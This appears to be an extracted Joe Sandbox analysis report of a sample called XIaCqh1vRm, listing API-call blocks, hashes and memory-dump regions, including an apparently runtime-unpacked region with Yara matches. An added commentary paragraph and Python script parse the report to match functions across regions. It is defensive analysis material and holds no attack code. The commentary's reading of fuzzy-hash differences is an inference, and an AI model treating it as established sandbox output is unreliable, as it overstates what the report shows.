                                                                                                                                                                                                                                                                          • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction ID: d057494db3768f074dcbe2801d37f5ae70fdc10ebbafc09334dac90c7717604e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F02B728402087BCF04E754CC81BEB3B989B09316F04806BDD46AB182EB689946CBA4
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                          • String ID: F(@
                                                                                                                                                                                                                                                                          • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                          • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                          • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                          • String ID: F(@
                                                                                                                                                                                                                                                                          • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                          • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                          • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pScheduler
                                                                                                                                                                                                                                                                          • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                                                          • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                          • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                                                          • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                                                          • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                          • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                          • String ID: B
                                                                                                                                                                                                                                                                          • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                                                          • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                          • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pScheduler$version
                                                                                                                                                                                                                                                                          • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                                                          • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                          • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                          • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                          • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                          • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                          • Instruction ID: 359585f543fb61817e44aa8209f9bb017510ec38934e65a20ff6745d2fe46f3f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65A158799007869FD762CF1CC8907AEBBE1EF55310F6481AFD485AB381D334A941CB50
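The two preceding blocks are worth reading together: the function with API String ID 1036877536-0 (__alldvrm$_strrchr) appears once in the dump that is backed by the on-disk PE at offset 00400000 and again in the region at 02490000, which the report marks "based on PE: false" and tags with a Yara match. That is the runtime-unpacked copy of the code, and correlating functions across dump regions by their API String ID is how an analyst confirms it without re-running the sample. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the block layout as extracted on this page (one block per "APIs" heading, "•"-bulleted fields, the "Source File ... based on PE" line) and returns the IDs shared between regions. The embedded SAMPLE is a trimmed copy of three blocks from this section; the field names and bullet character are assumed to match this extraction.

```python
"""Correlate Joe Sandbox function blocks across memory-dump regions (added example)."""
import re
from collections import defaultdict

# Constructed sample: three blocks copied from the report section above, indentation
# trimmed. The 02490000 region is the one the report marks "based on PE: false" with
# a Yara match, i.e. memory the sample filled at runtime rather than the mapped image.
SAMPLE = """
APIs
• CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
• FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
• _free.LIBCMT ref: 0042E069
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: CloseFreeHandleLibrary_free
• String ID: B
• API String ID: 621396759-3071617958
• Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
APIs
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Instruction Fuzzy Hash: 65A158799007869FD762CF1CC8907AEBBE1EF55310F6481AFD485AB381D334A941CB50
"""

# Field layouts assumed from this extraction of the report (bullet "•", field names as shown).
_SOURCE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
_REF = re.compile(r"^•\s*(.+?),?\s+ref:\s*([0-9A-Fa-f]{8})$")
_FIELD = re.compile(r"^•\s*(API ID|API String ID|Instruction Fuzzy Hash):\s*(.*)$")


def parse_blocks(text):
    """Split report text into one dict per function block; a block starts at an 'APIs' line."""
    blocks = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"refs": [], "yara": False}
            blocks.append(cur)
            continue
        if cur is None or not line:
            continue
        if line == "Yara matches":
            cur["yara"] = True
        elif (m := _SOURCE.search(line)):
            cur["source"] = m.group(1)
            cur["offset"] = m.group(2).upper()
            cur["based_on_pe"] = m.group(3) == "true"
        elif (m := _FIELD.match(line)):
            cur[m.group(1)] = m.group(2)
        elif (m := _REF.match(line)):
            # (API call as printed, address of the call site)
            cur["refs"].append((m.group(1), m.group(2).upper()))
    return blocks


def unpacked_regions(blocks):
    """Offsets of dump regions not backed by the on-disk PE, i.e. code written at runtime."""
    return sorted({b["offset"] for b in blocks if "offset" in b and not b["based_on_pe"]})


def shared_functions(blocks):
    """API String ID -> {(offset, based_on_pe, yara)} for IDs seen in more than one dump region."""
    seen = defaultdict(set)
    for b in blocks:
        if "API String ID" in b and "offset" in b:
            seen[b["API String ID"]].add((b["offset"], b["based_on_pe"], b["yara"]))
    return {k: v for k, v in seen.items() if len({off for off, _, _ in v}) > 1}


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    print("unpacked regions:", unpacked_regions(parsed))
    for api_id, places in shared_functions(parsed).items():
        print(api_id, "->", sorted(places))
```

Run against the full report text instead of SAMPLE, the same two functions give the complete picture: every API String ID that shows up both in the 00400000 image and in a non-PE-backed region is a candidate for the unpacked payload, and the Instruction Fuzzy Hash of each pair (different here, 44A1... versus 65A1..., as the page shows) tells you whether the unpacked copy was relinked or merely relocated.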
APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024C047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024C6B51
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024C6BDA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024C6BEC
• __freea.LIBCMT ref: 024C6BF5
  • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
APIs
• SetEvent.KERNEL32(?,00000000), ref: 00423739
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
  • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
• __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
• String ID:
• API String ID: 2630251706-0
APIs
• ShowWindow.USER32(00000005), ref: 00401FAF
• UpdateWindow.USER32 ref: 00401FB7
• ShowWindow.USER32(00000000), ref: 00401FCB
• MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Window$Show$MoveUpdate
• String ID:
• API String ID: 1339878773-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                          • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                                                            • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                                                            • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 737400349-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 024B934A
                                                                                                                                                                                                                                                                            • Part of subcall function 024B9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024B92C6
                                                                                                                                                                                                                                                                            • Part of subcall function 024B9297: ___AdjustPointer.LIBCMT ref: 024B92E1
                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 024B935F
                                                                                                                                                                                                                                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024B9370
                                                                                                                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 024B9398
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 737400349-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction ID: 28681ba3d8e0ef8aa481e3ad18e185457c2db1351c87df434b1823a2a6d0915f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96011732500148BBCF125EA6CC40EEB3F6AEF48754F054419FE5896120D376E861AFB0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378), ref: 024C51C8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024C2213), ref: 024C51D4
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024C51E2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction ID: c05e4e793d37aab7a09084e07b295d753bb2f2775b30038cc04b733b28b8915c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F601FC3EA022226BC7614F6D9C48E5F7B98AF46F617700639F905F7340CB20E541CAE4
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
